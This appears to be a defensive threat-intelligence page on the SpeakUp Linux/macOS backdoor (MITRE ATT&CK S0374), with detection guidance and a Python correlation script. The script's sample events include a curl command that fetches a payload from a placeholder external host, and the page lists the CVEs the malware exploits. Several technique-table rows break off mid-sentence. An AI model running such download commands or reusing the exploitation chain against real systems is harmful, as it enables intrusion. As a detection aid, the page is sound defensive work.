S0374: SpeakUp
Analyst context for executives and security teams
SpeakUp matters because it represents a Linux and macOS backdoor family with behaviors that touch execution, persistence, discovery, credential access, command-and-control, tool transfer, and cleanup. For leaders, the key issue is not the malware name alone; it is whether Unix-like endpoints and servers have enough visibility to show when a backdoor is profiling the host, mapping network services, using web traffic for command-and-control, scheduling persistence through cron, or deleting artifacts.
Executive priority
Prioritize this as a Unix/Linux and macOS visibility and response-readiness question. Security leaders should ask whether SOC and IR teams can collect and retain the evidence needed to investigate backdoor activity on non-Windows systems: process execution, shell and Python activity, cron changes, authentication attempts, network connections, downloaded files, and file deletion. This is also relevant to vulnerability and exposure management because the related ATT&CK behaviors include exploitation for client execution, password guessing, and network service discovery.
Technical view
ATT&CK does not provide a dedicated detection note for SpeakUp, so validation should be behavior-led. On Linux and macOS, defenders should test visibility around the related techniques: system, user, network configuration, network connection, and network service discovery; command and scripting interpreter use, including Python; cron-based scheduled execution; web-protocol command-and-control; standard encoding or encrypted/encoded files; ingress tool transfer; password guessing; exploitation for client execution; and file deletion. Detection engineering should correlate these behaviors rather than relying on a single malware signature.
Likely telemetry
- Linux and macOS process creation and command-line telemetry
- Shell and Python interpreter execution records
- Cron and crontab file change monitoring
- Authentication logs showing repeated or unusual password guessing patterns
- Network connection and DNS/proxy/web traffic logs for outbound HTTP/S-like command-and-control patterns
Detection direction
- Validate that Linux and macOS systems are covered, not only Windows endpoints.
- Create behavior correlations for discovery commands followed by outbound web traffic, tool transfer, cron persistence, or file deletion.
- Tune carefully for administrator activity: network enumeration, shell use, Python execution, and cron changes can be legitimate on Unix-like systems.
- Review whether web-protocol monitoring can identify unusual destinations, uncommon user agents, encoded payload patterns, or unexpected outbound traffic from servers.
- Confirm that file deletion and temporary artifact cleanup are logged with enough retention to support incident response.
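The correlation idea in the bullets above, written out as an added example (this is not code from the ATT&CK object or from Glexia): per host and user, a discovery command starts a correlation window, and an alert fires only when at least two distinct follow-on behaviours (outbound web traffic to a non-internal destination, tool download, crontab write, file deletion) land inside that window, so an administrator running a single enumeration command does not trip it. The event schema, the ten-minute window, the two-category threshold, the internal address prefixes and all sample events are constructed assumptions for the example.

```python
"""Correlate Unix discovery commands with follow-on backdoor-like behaviour.

Constructed example: the event format, window, threshold and sample records
are assumptions, not a real telemetry schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumption: how long after discovery we look
MIN_CATEGORIES = 2               # assumption: distinct follow-on behaviours required
DISCOVERY_BINARIES = {"uname", "whoami", "id", "ifconfig", "ip", "netstat", "ss", "arp", "nmap"}
TRANSFER_BINARIES = {"curl", "wget"}
INTERNAL_PREFIXES = ("10.", "127.", "192.168.", "172.16.", "172.17.", "172.18.", "172.19.",
                     "172.20.", "172.21.", "172.22.", "172.23.", "172.24.", "172.25.",
                     "172.26.", "172.27.", "172.28.", "172.29.", "172.30.", "172.31.")

# Constructed sample events (web01 shows the full chain, db02 is benign admin work).
EVENTS = [
    {"ts": "2019-02-04T10:00:01", "host": "web01", "user": "www-data", "type": "process", "cmd": "uname -a"},
    {"ts": "2019-02-04T10:00:02", "host": "web01", "user": "www-data", "type": "process", "cmd": "whoami"},
    {"ts": "2019-02-04T10:00:03", "host": "web01", "user": "www-data", "type": "process", "cmd": "ifconfig"},
    {"ts": "2019-02-04T10:00:20", "host": "web01", "user": "www-data", "type": "network",
     "dst": "203.0.113.10:80", "proto": "http", "method": "POST"},
    {"ts": "2019-02-04T10:00:25", "host": "web01", "user": "www-data", "type": "process",
     "cmd": "curl -o /tmp/.stage http://203.0.113.10/s"},
    {"ts": "2019-02-04T10:00:30", "host": "web01", "user": "www-data", "type": "file",
     "op": "write", "path": "/var/spool/cron/crontabs/www-data"},
    {"ts": "2019-02-04T10:00:40", "host": "web01", "user": "www-data", "type": "file",
     "op": "delete", "path": "/tmp/.stage"},
    {"ts": "2019-02-04T11:00:00", "host": "db02", "user": "alice", "type": "process", "cmd": "netstat -an"},
    {"ts": "2019-02-04T11:00:05", "host": "db02", "user": "alice", "type": "network",
     "dst": "10.0.0.5:443", "proto": "https", "method": "GET"},
]


def parse_ts(s):
    return datetime.fromisoformat(s)


def is_external(dst):
    """Treat anything outside the assumed internal prefixes as external."""
    host = dst.rsplit(":", 1)[0]
    return not host.startswith(INTERNAL_PREFIXES)


def is_discovery(ev):
    return ev["type"] == "process" and ev["cmd"].split()[0] in DISCOVERY_BINARIES


def follow_on_category(ev):
    """Map an event to one of the follow-on behaviours named in the guidance, or None."""
    if ev["type"] == "network" and ev.get("proto") in ("http", "https") and is_external(ev["dst"]):
        return "outbound_web"
    if ev["type"] == "process" and ev["cmd"].split()[0] in TRANSFER_BINARIES:
        return "tool_transfer"
    if ev["type"] == "file" and ev["op"] == "write" and "cron" in ev["path"]:
        return "cron_persistence"
    if ev["type"] == "file" and ev["op"] == "delete":
        return "file_deletion"
    return None


def correlate(events):
    """Return one alert per (host, user) whose discovery command is followed,
    within WINDOW, by at least MIN_CATEGORIES distinct follow-on behaviours."""
    by_actor = defaultdict(list)
    for ev in events:
        by_actor[(ev["host"], ev["user"])].append(ev)

    alerts = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: parse_ts(e["ts"]))
        for i, ev in enumerate(evs):
            if not is_discovery(ev):
                continue
            start = parse_ts(ev["ts"])
            categories, evidence = set(), [ev]
            for later in evs[i + 1:]:
                if parse_ts(later["ts"]) - start > WINDOW:
                    break
                cat = follow_on_category(later)
                if cat and cat not in categories:
                    categories.add(cat)
                    evidence.append(later)
            if len(categories) >= MIN_CATEGORIES:
                alerts.append({"host": host, "user": user, "first_discovery": ev["cmd"],
                               "categories": sorted(categories), "evidence": evidence})
                break  # one alert per actor; later discovery commands are covered by it
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(f"{alert['host']}/{alert['user']}: after '{alert['first_discovery']}' saw "
              f"{', '.join(alert['categories'])} ({len(alert['evidence'])} events)")
```

The threshold is the tuning knob the bullets ask for: raising MIN_CATEGORIES or adding an allowlist of maintenance accounts to the actor key suppresses routine administration, while keeping the window short limits how much unrelated activity gets bundled into one alert.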
Mitigation priorities
- Strengthen monitoring and hardening for Linux and macOS endpoints and servers before focusing on malware-family-specific signatures.
- Restrict and monitor administrative shell, Python, and cron usage according to operational need.
- Reduce credential-guessing risk with strong authentication controls, rate limiting or lockout where appropriate, and review of exposed authentication surfaces.
- Limit unnecessary outbound web access from servers and inspect egress patterns consistent with command-and-control or tool transfer.
- Maintain vulnerability management for client applications and services that could support code execution paths.
Analyst notes and limits
The supplied ATT&CK object identifies SpeakUp as a Trojan backdoor targeting Linux and OSX/macOS devices, first observed in January 2019. The relationship set provides the most useful defensive context: discovery, execution, cron persistence, web-protocol C2, encoding, tool transfer, password guessing, exploitation for client execution, and file deletion. Treat this as a coverage validation object for Unix-like environments.
No official ATT&CK detection text is provided, tactics are not specified on the malware object itself, and the supplied fields do not support claims about current activity, attribution, victimology, exploit details, or guaranteed detection coverage. Local telemetry, baselines, and exposure data are required to determine material risk.
SpeakUp
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1082 | System Information Discovery | SpeakUp uses the |
| Enterprise | T1053.003 | Cron Sub-technique | SpeakUp uses cron tasks to ensure persistence. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | SpeakUp downloads and executes additional files from a remote server. [1] |
| Enterprise | T1059.006 | Python Sub-technique | SpeakUp uses Python scripts. [1] |
| Enterprise | T1110.001 | Password Guessing Sub-technique | SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. [1] |
| Enterprise | T1033 | System Owner/User Discovery | SpeakUp uses the |
| Enterprise | T1046 | Network Service Discovery | SpeakUp checks for availability of specific ports on servers. [1] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. [1] |
| Enterprise | T1016 | System Network Configuration Discovery | SpeakUp uses the |
| Enterprise | T1203 | Exploitation for Client Execution | SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager. [1] |
| Enterprise | T1070.004 | File Deletion Sub-technique | SpeakUp deletes files to remove evidence on the machine. [1] |
| Enterprise | T1059 | Command and Scripting Interpreter | SpeakUp uses Perl scripts. [1] |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | SpeakUp encodes C&C communication using Base64. [1] |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | SpeakUp encodes its second-stage payload with Base64. [1] |
| Enterprise | T1049 | System Network Connections Discovery | SpeakUp uses the |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | ff29e9913230… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] CheckPoint SpeakUp Feb 2019: Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
- [2] mitre-attack S0374
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.